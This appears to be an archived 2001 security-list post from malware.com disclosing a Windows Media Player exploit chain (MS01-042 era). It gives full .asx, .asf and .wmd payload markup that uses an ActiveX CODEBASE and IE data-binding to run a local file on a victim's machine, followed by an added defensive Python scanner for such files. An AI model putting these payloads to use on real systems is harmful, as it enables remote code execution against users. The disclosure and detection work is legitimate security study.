> ----------------------------------------------------------------------
> Title:     Windows Media Player .NSC Processor Contains Unchecked Buffer
> Date:      26 July 2001
> Software:  Windows Media Player 6.4, 7, and 7.1
> Impact:    Run code of attacker's choice.
> Bulletin:  MS01-042

Here, while you are about it, take a look at this:

Windows Media Player executing files on the target computer as follows:

1. Create an *.asx meta file as follows:

   <ASX><Entry><ref HREF=''/></ASX>
   <IFRAME SRC='about:<body><html><OBJECT CLASSID="CLSID:10000000-0000-0000-0000-000000000000" CODEBASE="C:\WINDOWS\Regedit.exe"></OBJECT></html></body>'></IFRAME>
   <!-- 27.07.01 http://www.malware.com -->

2. Create an *.asf file with URL flip as follows:

   about:<OBJECT ID="Content" WIDTH=0 HEIGHT=0 CLASSID="CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="file://C:\My Documents\My Music\Virtual Albums\malware\malware.asx"><PARAM NAME="UseHeader" VALUE="true"></OBJECT><div datasrc=#Content datafld="<ASX><Entry><ref HREF=''/></ASX>" dataformatas="HTML" style="width: 100%; height: 60%;"></div>

3. Create a *.wmd file comprising 1 and 2 above.

What happens?

Ordinarily the Windows Media Download Package file (*.wmd) creates a folder with the given name of the *.wmd file -- e.g. malware.wmd will create a folder called malware in the default location for so-called "Virtual Music" -- specifically: My Documents\My Music\Virtual Albums\malware. Security measures currently incorporated in the extraction of the contents of the *.wmd do a reasonably good job of ensuring that files contained within the Download Package are in fact valid files. A reasonably good job.

We find that the bare minimum for the *.asx meta file must include the following:

   <ASX><Entry><ref HREF=''/></ASX>

With these tags the Media Player will indeed extract the *.asx file into our known folder. So how do we make use of that? Databinding. We find that we can parse html using the databinding control included in IE5. And we do it like so: the databinding control requires a header to match what it is to write as html. What we do, quite brilliantly actually, is use the *.asx header as our header for the databinding control:

   *.asx:               <ASX><Entry><ref HREF=''/></ASX>
   databinding control: datafld="<ASX><Entry><ref HREF=''/></ASX>"

The Windows Media Package file (malware.wmd) is automatically opened from web or news or mail; it automatically creates the malware folder in the so-called "Virtual Music" directory. It automatically extracts the malware.asx meta file, which is valid but includes our ActiveX component as above, and it extracts our malware.asf file which includes our URL flip. The URL flip is called once the malware.asf starts playing; it creates an "about" window from within the malware folder. The "about" window includes our databinding control which points to the malware.asx, which is rendered as *.html because the datafld header *IS* the *.asx meta tag! And that all in turn executes! our file on the target computer.

notes:

1. the machine that this is all on is now dead thanks to your module MSDXM.OCX which will require a reformat. Nevertheless a fully functional example has been thoroughly tested in "the field"

2. the "free" Advanced Script Indexer that comes with the Windows Media 7 Resource Kit allows us to include in the URL flip whatever we like.

3. the path to the so-called "Virtual Music" directory is hard-coded in the above. The possibility of not having to know the location is good because everything is opened from within the same folder created by the Windows Media Download package, i.e. possibly through a "skin" file, or some other entry in the *.asx such as an <event> parameter coupled with scripting in the *.asf or *.wmz file(s); relative paths should work.

4. when it suits us, we'll recompile the working example if none of the above is clear.

5. it took 10 days to conceive, craft and construct, of which about 5 days were spent crashing and scandisk"ing" at minimum 4 times per day. Win98. Very unstable.

---
http://www.malware.com
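Added example, not part of the original post and not code from malware.com: a small Python checker that a defender could run over the members extracted from a Windows Media Download Package. It flags exactly the shape the post describes, a minimal valid-looking <ASX><Entry><ref/></ASX> header with browser markup tucked behind it (IFRAME, OBJECT/CLASSID, a CODEBASE on a local path, an about: URL, IE data-binding attributes), and it also reports any element outside the ASX vocabulary and any markup after the closing </ASX>. The ASX element list, the function names, the file names and both sample contents are assumptions constructed for this example; the suspicious sample mirrors the structure of the post's step 1 with a placeholder CLSID and path.

```python
import re

# Element names that legitimately occur in a Windows Media metafile (.asx).
# This vocabulary is an assumption for the example; extend it from the ASX reference.
ASX_ELEMENTS = {
    "asx", "entry", "entryref", "ref", "title", "author", "copyright", "abstract",
    "banner", "moreinfo", "param", "base", "duration", "starttime", "event",
    "repeat", "logo", "previewduration", "endmarker", "startmarker", "skin",
}

# Browser-level constructs that have no place in a metafile.  Each one is a
# piece of the pattern described in the post: a valid-looking <ASX> header
# followed by HTML that instantiates an ActiveX object from a local path, or
# data-binding markup that makes IE render the metafile itself as HTML.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"<\s*iframe\b", re.I), "IFRAME element"),
    (re.compile(r"<\s*object\b", re.I), "OBJECT element"),
    (re.compile(r"\bclassid\s*=", re.I), "CLASSID attribute (ActiveX instantiation)"),
    (re.compile(r"\bcodebase\s*=\s*['\"]?(?:[a-z]:\\|file:)", re.I),
     "CODEBASE pointing at a local path"),
    (re.compile(r"\babout:", re.I), "about: URL (in-place HTML rendering)"),
    (re.compile(r"\bdata(?:src|fld)\s*=", re.I), "IE data-binding attribute"),
]

COMMENT_RE = re.compile(r"<!--.*?-->", re.S)
TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)")


def scan_asx(text):
    """Return a list of findings for the body of an .asx file; [] means clean."""
    body = COMMENT_RE.sub("", text)
    findings = [label for pattern, label in SUSPICIOUS_PATTERNS if pattern.search(body)]

    # Any element outside the ASX vocabulary is reported: a metafile that is
    # "valid" only because it starts with <ASX><Entry><ref/></ASX> still fails this.
    unknown = sorted({m.group(1).lower() for m in TAG_RE.finditer(body)} - ASX_ELEMENTS)
    if unknown:
        findings.append("non-ASX element(s): " + ", ".join(unknown))

    # Anything after the last closing </ASX> is not metafile content at all.
    close = [m.end() for m in re.finditer(r"<\s*/\s*asx\s*>", body, re.I)]
    if close and body[close[-1]:].strip():
        findings.append("markup after the closing </ASX>")
    return findings


def scan_package(members):
    """members: {file name: text} for the files extracted from a .wmd package.
    Only .asx metafiles are inspected; other members are reported as skipped."""
    report = {}
    for name, text in members.items():
        if name.lower().endswith(".asx"):
            report[name] = scan_asx(text)
        else:
            report[name] = ["not inspected (only .asx members are checked here)"]
    return report


# Constructed samples.  The second one mirrors the structure of the post's
# step 1 with a placeholder CLSID and path; neither comes from the original page.
BENIGN_ASX = """<ASX version="3.0">
  <Title>Constructed benign playlist</Title>
  <Entry><Ref HREF="mms://media.example.invalid/track1.wma"/></Entry>
</ASX>"""

SUSPICIOUS_ASX = (
    "<ASX><Entry><ref HREF=''/></ASX>\n"
    "<IFRAME SRC='about:<html><body><OBJECT "
    "CLASSID=\"CLSID:00000000-0000-0000-0000-000000000000\" "
    "CODEBASE=\"C:\\placeholder\\example.exe\"></OBJECT></body></html>'></IFRAME>\n"
    "<!-- constructed sample; placeholder values -->"
)

if __name__ == "__main__":
    report = scan_package({"clean.asx": BENIGN_ASX,
                           "suspect.asx": SUSPICIOUS_ASX,
                           "suspect.asf": "(binary member, not shown)"})
    for name, findings in report.items():
        print(name, "->", findings or ["clean"])
```

The check is deliberately stricter than the extractor the post describes: rather than asking whether the file begins with a valid ASX header, it asks whether anything in the file is not ASX. The .asf "URL flip" itself lives inside a binary ASF script command, so a complete package scanner would additionally extract script-command text from .asf members and run the same patterns over it.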
This archive was generated by hypermail 2b30 : Fri Jul 27 2001 - 10:45:11 PDT